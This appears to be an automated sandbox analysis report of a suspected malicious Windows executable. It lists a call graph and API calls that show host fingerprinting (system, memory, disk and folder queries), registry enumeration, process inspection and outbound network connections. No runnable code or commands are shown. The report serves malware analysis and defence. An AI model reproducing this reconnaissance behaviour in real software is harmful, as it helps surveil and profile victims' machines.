41771c 71968 41cb20 _open 71949->71968 71951->71938 71953 4176a0 2 API calls 71952->71953 71954 4492e5 71953->71954 71955 4492f3 71954->71955 71957 4493c3 71954->71957 71961 449335 WSAIoctl 71955->71961 71962 449392 71955->71962 71956 4493be 71956->71938 71957->71962 71969 42d090 _open 71957->71969 71959 4493f7 71970 454f40 _open 71959->71970 71961->71962 71964 449366 71961->71964 71962->71956 71971 4550a0 _open 71962->71971 71964->71962 71965 449371 setsockopt 71964->71965 71965->71962 71966->71951 71967->71949 71968->71951 71969->71959 71970->71962 71971->71956 71972 450700 71973 45099d 71972->71973 71979 450719 71972->71979 71977 4509f6 71998 4175a0 71977->71998 71978 450a35 72002 454f40 _open 71978->72002 71979->71973 71979->71977 71979->71978 71980 4509b5 71979->71980 71990 417310 _open 71979->71990 71991 44b8e0 _open 71979->71991 71992 47f570 _open 71979->71992 71993 43eb30 _open 71979->71993 71994 4713a0 _open 71979->71994 71995 4939a0 _open 71979->71995 71996 43eae0 _open 71979->71996 71980->71973 71997 4550a0 _open 71980->71997 71988 4175a0 _open 71988->71973 71990->71979 71991->71979 71992->71979 71993->71979 71994->71979 71995->71979 71996->71979 71997->71973 71999 4175d1 71998->71999 72000 4175aa 71998->72000 71999->71988 72000->71999 72003 4172a0 _open 72000->72003 72002->71973 72003->71999 72004 4113c9 72007 411160 72004->72007 72006 4113a1 72007->72006 72008 798a20 10 API calls 72007->72008 72008->72007 72251 4c4720 72252 4c4728 72251->72252 72253 4c4733 72252->72253 72262 4c476c 72252->72262 72267 4c5540 closesocket 72252->72267 72255 4c4774 72257 4c482e 72257->72262 72268 4c9270 72257->72268 72259 4c4860 72273 4c4950 72259->72273 72261 4c4878 72262->72261 72263 4c30a0 72262->72263 72264 4c30b0 72263->72264 72266 4c31bc 72263->72266 72264->72266 72279 4c3320 72264->72279 72266->72255 72267->72257 72288 4ca440 72268->72288 72270 4c9297 72271 4c92ab 72270->72271 72316 4cbbe0 closesocket 72270->72316 72271->72259 72274 4c4966 72273->72274 72276 4c49c5 72274->72276 72278 4c49b9 72274->72278 72317 4cbbe0 closesocket 72274->72317 72275 4c4aa0 gethostname 72275->72276 72275->72278 72276->72262 72278->72275 72278->72276 72282 4c3332 72279->72282 72280 4c33a9 72280->72266 72282->72280 72283 4d9440 72282->72283 72284 4d9450 72283->72284 72285 4d9475 72284->72285 72287 4d9320 closesocket 72284->72287 72285->72282 72287->72284 72314 4ca46b 72288->72314 72289 4caa03 RegOpenKeyExA 72290 4caa27 RegQueryValueExA 72289->72290 72291 4cab70 RegOpenKeyExA 72289->72291 72293 4caacc RegQueryValueExA 72290->72293 72294 4caa71 72290->72294 72292 4cac34 RegOpenKeyExA 72291->72292 72313 4cab90 72291->72313 72295 4cacf8 RegOpenKeyExA 72292->72295 72312 4cac54 72292->72312 72296 4cab0e 72293->72296 72297 4cab66 RegCloseKey 72293->72297 72294->72293 72299 4caa85 RegQueryValueExA 72294->72299 72298 4cad56 RegEnumKeyExA 72295->72298 72303 4cad14 72295->72303 72296->72297 72302 4cab1e RegQueryValueExA 72296->72302 72297->72291 72300 4cad9b 72298->72300 72298->72303 72301 4caab3 72299->72301 72304 4cae16 RegOpenKeyExA 72300->72304 72301->72293 72309 4cab4c 72302->72309 72303->72270 72305 4caddf RegEnumKeyExA 72304->72305 72306 4cae34 RegQueryValueExA 72304->72306 72305->72303 72305->72304 72307 4caf43 RegQueryValueExA 72306->72307 72315 4cadaa 72306->72315 72308 4cb052 RegQueryValueExA 72307->72308 72307->72315 72310 4cadc7 RegCloseKey 72308->72310 72308->72315 72309->72297 72310->72305 72311 4cafa0 RegQueryValueExA 72311->72315 72312->72295 72313->72292 72314->72289 72314->72303 72315->72307 72315->72308 72315->72310 72315->72311 72316->72271 72317->72278 72318 8e7460 72319 8e7492 72318->72319 72320 8e749e 72319->72320 72323 798f70 72319->72323 72322 8e74a7 72330 798e90 _open 72323->72330 72325 798f82 72326 798e90 _open 72325->72326 72327 798fa2 72326->72327 72328 798f70 _open 72327->72328 72329 798fb8 72328->72329 72329->72322 72331 798eba 72330->72331 72331->72325 72332 41f7b0 72335 41f7c3 72332->72335 72354 41f97a 72332->72354 72334 41f932 72359 44cd80 72334->72359 72335->72354 72355 420150 72335->72355 72337 41f854 72337->72334 72337->72354 72383 41fec0 WSACloseEvent select closesocket _open 72337->72383 72338 41f942 72339 41f987 72338->72339 72340 461390 _open 72338->72340 72379 461390 72339->72379 72340->72338 72344 461390 _open 72345 41f9a0 72344->72345 72346 461390 _open 72345->72346 72347 41f9ac 72346->72347 72348 41f9bb WSACloseEvent 72347->72348 72349 4175a0 _open 72348->72349 72350 41f9df 72349->72350 72351 4175a0 _open 72350->72351 72352 41fa12 72351->72352 72353 4175a0 _open 72352->72353 72353->72354 72356 420167 72355->72356 72358 4201c3 72356->72358 72384 4230d0 _open 72356->72384 72358->72337 72360 44d0f1 72359->72360 72368 44cd9a 72359->72368 72360->72338 72361 44d0e5 72362 461390 _open 72361->72362 72362->72360 72363 44d0b4 72392 42f6c0 WSACloseEvent select closesocket _open 72363->72392 72364 44ce6b 72369 44d064 72364->72369 72374 44cf4b 72364->72374 72386 44dc30 closesocket _open 72364->72386 72368->72361 72368->72364 72385 44dc30 closesocket _open 72368->72385 72369->72363 72391 44de00 closesocket _open 72369->72391 72372 44d016 72372->72369 72390 44de00 closesocket _open 72372->72390 72374->72372 72375 44d018 72374->72375 72376 426fa0 select 72374->72376 72387 44e130 closesocket _open 72374->72387 72388 427380 _open 72374->72388 72389 427380 _open 72375->72389 72376->72374 72380 41f98d 72379->72380 72382 46139d 72379->72382 72380->72344 72381 4175a0 _open 72381->72380 72382->72381 72383->72337 72384->72358 72385->72368 72386->72364 72387->72374 72388->72374 72389->72372 72390->72372 72391->72369 72392->72361 72009 448b50 72010 448b6b 72009->72010 72039 448be6 72009->72039 72011 448bf3 72010->72011 72012 448b8f 72010->72012 72010->72039 72042 44a550 72011->72042 72113 426e40 select 72012->72113 72016 448cd9 SleepEx 72026 448d14 72016->72026 72017 448e85 72021 448eae 72017->72021 72017->72039 72119 422a00 _open 72017->72119 72018 448c35 72101 44a150 72018->72101 72019 448c1f connect 72019->72018 72020 44a150 2 API calls 72030 448dff 72020->72030 72021->72039 72120 4178b0 closesocket 72021->72120 72022 448cb2 72022->72017 72022->72020 72022->72039 72025 448d43 72034 44a150 2 API calls 72025->72034 72026->72022 72026->72025 72028 448bb5 72028->72039 72115 4550a0 _open 72028->72115 72029 448c8b 72032 448dc8 72029->72032 72033 448ba1 72029->72033 72030->72017 72117 42d090 _open 72030->72117 72116 44b100 _open 72032->72116 72033->72016 72033->72022 72033->72028 72034->72028 72037 448e67 72118 454fd0 _open 72037->72118 72043 44a575 72042->72043 72045 44a597 72043->72045 72124 4175e0 72043->72124 72094 44a6d9 72045->72094 72136 44ef30 72045->72136 72047 44a709 72049 4178b0 2 API calls 72047->72049 72057 44a713 72047->72057 72049->72057 72050 448bfc 72050->72018 72050->72019 72050->72022 72050->72039 72052 44a7e5 72056 44a811 setsockopt 72052->72056 72060 44a87c 72052->72060 72072 44a8ee 72052->72072 72054 44a641 72054->72052 72150 454fd0 _open 72054->72150 72056->72060 72065 44a83b 72056->72065 72057->72050 72149 4550a0 _open 72057->72149 72058 44a69b 72146 42d090 _open 72058->72146 72060->72072 72153 44b1e0 _open 72060->72153 72061 44a6c9 72147 454f40 _open 72061->72147 72065->72060 72151 42d090 _open 72065->72151 72066 44af56 72068 44af5d 72066->72068 72066->72094 72068->72057 72071 44a150 2 API calls 72068->72071 72069 44a86d 72152 454fd0 _open 72069->72152 72071->72057 72073 44ae32 72072->72073 72074 44acb8 72072->72074 72076 44abb9 72072->72076 72082 44af33 72072->72082 72072->72094 72095 44abe1 72072->72095 72073->72076 72161 454fd0 _open 72073->72161 72074->72076 72083 44acdc 72074->72083 72074->72094 72075 44b056 72164 42d090 _open 72075->72164 72079 44ad45 72076->72079 72080 44ade6 72076->72080 72076->72095 72155 446be0 11 API calls 72076->72155 72077 44af03 72077->72082 72162 454fd0 _open 72077->72162 72079->72080 72081 44ad5f 72079->72081 72159 42d090 _open 72080->72159 72156 4620d0 _open 72081->72156 72145 4767e0 ioctlsocket 72082->72145 72154 42d090 _open 72083->72154 72087 44b07b 72165 454f40 _open 72087->72165 72090 44ad7b 72096 44adb7 72090->72096 72157 454fd0 _open 72090->72157 72094->72047 72094->72057 72148 422a00 _open 72094->72148 72095->72075 72095->72077 72095->72094 72163 454fd0 _open 72095->72163 72158 463030 _open 72096->72158 72097 44ad01 72160 454f40 _open 72097->72160 72102 448c4d 72101->72102 72103 44a15f 72101->72103 72102->72029 72114 4550a0 _open 72102->72114 72103->72102 72104 44a181 getsockname 72103->72104 72105 44a1f7 72104->72105 72106 44a1d0 72104->72106 72107 44ef30 _open 72105->72107 72172 42d090 _open 72106->72172 72111 44a20f 72107->72111 72109 44a1eb 72174 454f40 _open 72109->72174 72111->72102 72173 42d090 _open 72111->72173 72113->72033 72114->72029 72115->72039 72116->72022 72117->72037 72118->72017 72119->72021 72121 4178c5 72120->72121 72123 4178d7 72120->72123 72175 4172a0 _open 72121->72175 72123->72039 72125 417607 socket 72124->72125 72126 4175ef 72124->72126 72127 41762b 72125->72127 72128 41763a 72125->72128 72126->72125 72129 417601 72126->72129 72130 417643 72126->72130 72166 4172a0 _open 72127->72166 72128->72045 72129->72125 72167 4172a0 _open 72130->72167 72133 417654 72168 41cb20 _open 72133->72168 72135 417674 72135->72045 72137 44ef47 72136->72137 72138 44efa8 72136->72138 72139 44ef81 72137->72139 72140 44ef4c 72137->72140 72144 44a63a 72138->72144 72171 41c960 _open 72138->72171 72170 473d10 _open 72139->72170 72140->72144 72169 473d10 _open 72140->72169 72144->72054 72144->72058 72145->72066 72146->72061 72147->72094 72148->72047 72149->72050 72150->72052 72151->72069 72152->72060 72153->72072 72154->72097 72155->72079 72156->72090 72157->72096 72158->72095 72159->72097 72160->72094 72161->72076 72162->72082 72163->72095 72164->72087 72165->72094 72166->72128 72167->72133 72168->72135 72169->72144 72170->72144 72171->72144 72172->72109 72173->72109 72174->72102 72175->72123 72393 4495b0 72394 4495c8 72393->72394 72395 4495fd 72393->72395 72394->72395 72396 44a150 2 API calls 72394->72396 72396->72395 72397 446ab0 72399 446ad5 72397->72399 72398 446bb4 72401 4c5ed0 9 API calls 72398->72401 72399->72398 72400 426fa0 select 72399->72400 72403 446b54 72400->72403 72402 446ba9 72401->72402 72403->72398 72403->72402 72404 446b5d 72403->72404 72404->72402 72406 4c5ed0 72404->72406 72409 4c5a50 72406->72409 72408 4c5ee5 72408->72404 72410 4c5a58 72409->72410 72415 4c5ea0 72409->72415 72411 4c5b50 72410->72411 72414 4c5b88 72410->72414 72421 4c5a99 72410->72421 72411->72414 72416 4c5b7a 72411->72416 72417 4c5eb4 72411->72417 72412 4c5e96 72446 4d9480 closesocket 72412->72446 72414->72412 72426 4da920 72414->72426 72445 4d9320 closesocket 72414->72445 72415->72408 72430 4c70a0 72416->72430 72419 4c6f10 7 API calls 72417->72419 72420 4c5ec2 72419->72420 72420->72420 72421->72414 72423 4c70a0 7 API calls 72421->72423 72437 4c6f10 72421->72437 72423->72421 72427 4da944 72426->72427 72428 4da94b 72427->72428 72429 4da977 send 72427->72429 72428->72414 72429->72414 72431 4c70ae 72430->72431 72433 4c717f 72431->72433 72435 4c71a7 72431->72435 72447 4da8c0 72431->72447 72451 4c71c0 72431->72451 72433->72435 72455 4d9320 closesocket 72433->72455 72435->72414 72438 4c6f35 72437->72438 72444 4c7019 72438->72444 72477 4da870 72438->72477 72441 4c701d 72441->72421 72442 4c6f4e 72442->72441 72443 4c71c0 5 API calls 72442->72443 72442->72444 72443->72442 72444->72441 72481 4d9320 closesocket 72444->72481 72445->72414 72446->72415 72448 4da8e6 72447->72448 72449 4da903 recvfrom 72447->72449 72448->72449 72450 4da8ed 72448->72450 72449->72450 72450->72431 72452 4c71e6 72451->72452 72454 4c71f2 72452->72454 72456 4c6050 72452->72456 72454->72431 72455->72435 72457 4c60d9 72456->72457 72462 4daa30 72457->72462 72459 4c62fc 72460 4c6050 5 API calls 72459->72460 72461 4c6506 72459->72461 72460->72461 72461->72454 72463 4daa5f 72462->72463 72464 4dab96 socket 72463->72464 72465 4dab75 72463->72465 72473 4dab04 72463->72473 72464->72465 72464->72473 72466 4dabd0 ioctlsocket 72465->72466 72469 4dad2e 72465->72469 72465->72473 72470 4dabef 72466->72470 72467 4dad0a setsockopt 72467->72469 72467->72473 72468 4dada0 connect 72468->72469 72469->72468 72471 4dade1 72469->72471 72469->72473 72470->72467 72470->72469 72470->72473 72471->72473 72474 4daf70 72471->72474 72473->72459 72475 4daf93 getsockname 72474->72475 72476 4daf8d 72474->72476 72475->72476 72476->72473 72478 4da88c 72477->72478 72479 4da8aa recv 72477->72479 72478->72479 72480 4da893 72478->72480 72479->72442 72480->72442 72481->72441 72176 412f17 72180 412f2c 72176->72180 72177 4131d3 72178 412fb3 RegOpenKeyExA 72178->72180 72179 41315c RegEnumKeyExA 72179->72180 72180->72177 72180->72178 72180->72179 72181 413046 RegOpenKeyExA 72180->72181 72183 41313b RegCloseKey 72180->72183 72181->72180 72182 413089 RegQueryValueExA 72181->72182 72182->72180 72182->72183 72183->72180 72184 4131d7 72185 4131f4 72184->72185 72186 413200 72185->72186 72190 413223 72185->72190 72191 4115b0 _lock 72186->72191 72188 41321e 72189 4132dc CloseHandle 72189->72188 72190->72189 72191->72188 72482 421139 72498 44baa0 72482->72498 72484 421148 72485 421512 72484->72485 72488 421161 72484->72488 72490 421527 72485->72490 72502 41fec0 WSACloseEvent select closesocket _open 72485->72502 72486 420f00 72493 420150 _open 72486->72493 72494 4175a0 _open 72486->72494 72496 420f7b 72486->72496 72504 44d4d0 closesocket _open 72486->72504 72505 424940 _open 72486->72505 72506 423900 _open 72486->72506 72488->72486 72489 420150 _open 72488->72489 72489->72486 72490->72486 72503 4222d0 WSACloseEvent select closesocket _open 72490->72503 72493->72486 72494->72486 72499 44bb60 72498->72499 72501 44bac7 72498->72501 72499->72484 72501->72499 72507 4305b0 _open 72501->72507 72502->72490 72503->72486 72504->72486 72505->72486 72506->72486 72507->72499 72192 41255d 72193 799f70 72192->72193 72194 41256c GetSystemInfo 72193->72194 72195 412589 72194->72195 72196 4125a0 GlobalMemoryStatusEx 72195->72196 72203 4125ec 72196->72203 72197 41263c GetDriveTypeA 72199 412655 GetDiskFreeSpaceExA 72197->72199 72197->72203 72198 412762 72200 4127d6 KiUserCallbackDispatcher 72198->72200 72199->72203 72201 4127f8 72200->72201 72202 412842 SHGetKnownFolderPath 72201->72202 72204 4128c3 72202->72204 72203->72197 72203->72198 72205 4128d9 FindFirstFileW 72204->72205 72206 412906 FindNextFileW 72205->72206 72207 412928 72205->72207 72206->72206 72206->72207 72508 8dfa30 72525 79dd50 72508->72525 72510 8dfa5a 72511 8dfa66 72510->72511 72512 798f70 _open 72510->72512 72513 8dfa6f 72512->72513 72528 7a12c0 72513->72528 72516 8dfaa6 72517 798f70 _open 72518 8dfaaf 72517->72518 72519 8dfb50 72518->72519 72521 8dfb06 72518->72521 72532 79b500 _lock 72519->72532 72520 8dfb44 72521->72520 72533 79b500 _lock 72521->72533 72523 8dfb79 72534 7a7430 72525->72534 72527 79dd61 72527->72510 72529 7a12cc 72528->72529 72538 79e050 72529->72538 72531 7a12fa 72531->72516 72531->72517 72532->72523 72533->72523 72535 7a7444 72534->72535 72536 7a7458 72535->72536 72537 7a747c _lock 72535->72537 72536->72527 72537->72527 72539 79e503 72538->72539 72547 79e09d 72538->72547 72542 79e243 72539->72542 72543 79e1a6 72539->72543 72545 7a0250 ungetc 72539->72545 72546 7a11a4 ungetc 72539->72546 72549 7a08d7 ungetc 72539->72549 72550 7a0006 ungetc 72539->72550 72551 7a0e3e ungetc 72539->72551 72540 79e18e 72540->72543 72544 79ed90 ungetc 72540->72544 72541 79e388 72541->72539 72541->72541 72541->72543 72552 7a00b8 ungetc 72541->72552 72542->72543 72548 7a0742 ungetc 72542->72548 72543->72531 72544->72543 72545->72539 72546->72539 72547->72539 72547->72540 72547->72541 72547->72542 72547->72543 72548->72543 72549->72539 72550->72539 72551->72539 72552->72541 72553 4129ff FindFirstFileA 72554 412a31 72553->72554 72555 412a5c RegOpenKeyExA 72554->72555 72556 412a93 72555->72556 72557 412ade CharUpperA 72556->72557 72559 412b0a 72557->72559 72558 412bf9 QueryFullProcessImageNameA 72560 412c3b CloseHandle 72558->72560 72559->72558 72562 412c64 72560->72562 72561 412df1 CloseHandle 72563 412e23 72561->72563 72562->72561 72208 413d5e 72209 413d30 72208->72209 72209->72208 72210 413d90 72209->72210 72214 420ab0 72209->72214 72217 41fcb0 WSACloseEvent select closesocket _open 72210->72217 72213 413dc1 72218 4205b0 72214->72218 72217->72213 72219 4205bd 72218->72219 72222 4207c7 72218->72222 72219->72222 72225 42066a 72219->72225 72231 4207ce 72219->72231 72235 4203c0 _open 72219->72235 72236 427450 _open 72219->72236 72222->72209 72228 4206f0 72225->72228 72225->72231 72237 4273b0 _open 72225->72237 72226 420707 WSAEventSelect 72226->72228 72226->72231 72227 4207ef 72227->72231 72234 420847 72227->72234 72239 426fa0 72227->72239 72228->72226 72228->72227 72230 4176a0 2 API calls 72228->72230 72230->72228 72238 427380 _open 72231->72238 72232 4209e8 WSAEnumNetworkEvents 72233 4209d0 WSAEventSelect 72232->72233 72232->72234 72233->72232 72233->72234 72234->72231 72234->72232 72234->72233 72235->72219 72236->72219 72237->72225 72238->72222 72240 426fd4 72239->72240 72242 426feb 72239->72242 72241 427207 select 72240->72241 72240->72242 72241->72242 72242->72234

                                  Executed Functions

                                  Function 0044F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                  • API String ID: 0-1590685507
                                  • Opcode ID: be826686751033df7c862ae39f12eed930f2ceda0ff19e9f282974445a119e06
                                  • Instruction ID: 7f5322daf576eff9cbb1d53aa87a4653d851604589cc3f59ca006e9235c25ee7
                                  • Opcode Fuzzy Hash: be826686751033df7c862ae39f12eed930f2ceda0ff19e9f282974445a119e06
                                  • Instruction Fuzzy Hash: 0BC29F31A043449FE714CF29C484B6BB7E1BF84314F05866EEC989B392D779E989CB85
                                  Function 0041255D Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 282fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetSystemInfo.KERNELBASE ref: 00412579
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 004125CC
                                  • GetDriveTypeA.KERNELBASE ref: 00412647
                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 0041267E
                                  • KiUserCallbackDispatcher.NTDLL ref: 004127E2
                                  • SHGetKnownFolderPath.SHELL32 ref: 0041286D
                                  • FindFirstFileW.KERNELBASE ref: 004128F8
                                  • FindNextFileW.KERNELBASE ref: 0041291F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                  • String ID: ;%A$@$`
                                  • API String ID: 2066228396-288790489
                                  • Opcode ID: 928609d3a233641c2fd607318e2958a7da4d733faa314ae4d0dec2888ae28278
                                  • Instruction ID: 8eb0867bef24a09d1750426a2bef6af7741b7bd6d56d34d458d6648663e1ce6c
                                  • Opcode Fuzzy Hash: 928609d3a233641c2fd607318e2958a7da4d733faa314ae4d0dec2888ae28278
                                  • Instruction Fuzzy Hash: 85D1C4B49043499FCB10EFA9C58969EBBF0FF49344F008969E898D7351E7749A84CF52
                                  Function 004129FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1271 4129ff-412a2f FindFirstFileA 1272 412a31-412a36 1271->1272 1273 412a38 1271->1273 1274 412a3d-412a91 call 8e1e50 call 8e1ee0 RegOpenKeyExA 1272->1274 1273->1274 1279 412a93-412a98 1274->1279 1280 412a9a 1274->1280 1281 412a9f-412b0c call 8e1e50 call 8e1ee0 CharUpperA call 798da0 1279->1281 1280->1281 1289 412b15 1281->1289 1290 412b0e-412b13 1281->1290 1291 412b1a-412b92 call 8e1e50 call 8e1ee0 call 798e80 call 798e70 1289->1291 1290->1291 1300 412b94-412ba3 1291->1300 1301 412bcc-412c66 QueryFullProcessImageNameA CloseHandle call 798da0 1291->1301 1304 412bb0-412bc0 call 798e68 1300->1304 1305 412ba5-412bae 1300->1305 1311 412c68-412c6d 1301->1311 1312 412c6f 1301->1312 1308 412bc5-412bca 1304->1308 1305->1301 1308->1300 1308->1301 1313 412c74-412ce9 call 8e1e50 call 8e1ee0 call 798e80 call 798e70 1311->1313 1312->1313 1322 412dcf-412e1c call 8e1e50 call 8e1ee0 CloseHandle 1313->1322 1323 412cef-412d49 call 798bb0 call 798da0 1313->1323 1333 412e23-412e2e 1322->1333 1336 412d99-412dad 1323->1336 1337 412d4b-412d63 call 798da0 1323->1337 1334 412e30-412e35 1333->1334 1335 412e37 1333->1335 1338 412e3c-412ed6 call 8e1e50 call 8e1ee0 1334->1338 1335->1338 1336->1322 1337->1336 1344 412d65-412d7d call 798da0 1337->1344 1353 412ed8-412ee1 1338->1353 1354 412eea 1338->1354 1344->1336 1349 412d7f-412d97 call 798da0 1344->1349 1349->1336 1355 412daf-412dc9 call 798e68 1349->1355 1353->1354 1356 412ee3-412ee8 1353->1356 1357 412eef-412f16 call 8e1e50 call 8e1ee0 1354->1357 1355->1322 1355->1323 1356->1357
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.1415376531.0000000000411000.00000040.00000001.01000000.00000004.sdmp, Offset: 00410000, based on PE: true
                                  • Associated: 00000005.00000002.1415356958.0000000000410000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415376531.0000000000B58000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415889910.0000000000B5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000B5D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000DF7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000ED6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EDF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1415906547.0000000000EED000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416221948.0000000000EEE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416342757.00000000010A2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000005.00000002.1416378233.00000000010A4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_410000_ZN34wF8WI2.jbxd
                                  Similarity
                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                  • String ID: 0
                                  • API String ID: 2406880114-4108050209
                                  • Opcode ID: 8f47dcbdc3b998ff7600f21fa8b8e3e81e9c22f90ba79658bdb2e7067dfb9356
                                  • Instruction ID: 941f4821e55578bcd52d49abb4b75b550e1cb2c5e4f55e76543c84a20cc79a35
                                  • Opcode Fuzzy Hash: 8f47dcbdc3b998ff7600f21fa8b8e3e81e9c22f90ba79658bdb2e7067dfb9356
                                  • Instruction Fuzzy Hash: 50E1D9B09053099FCB50EF68D9856AEBBF4EF44344F50886AE988D7350EB78D994CF42
                                  Function 004205B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
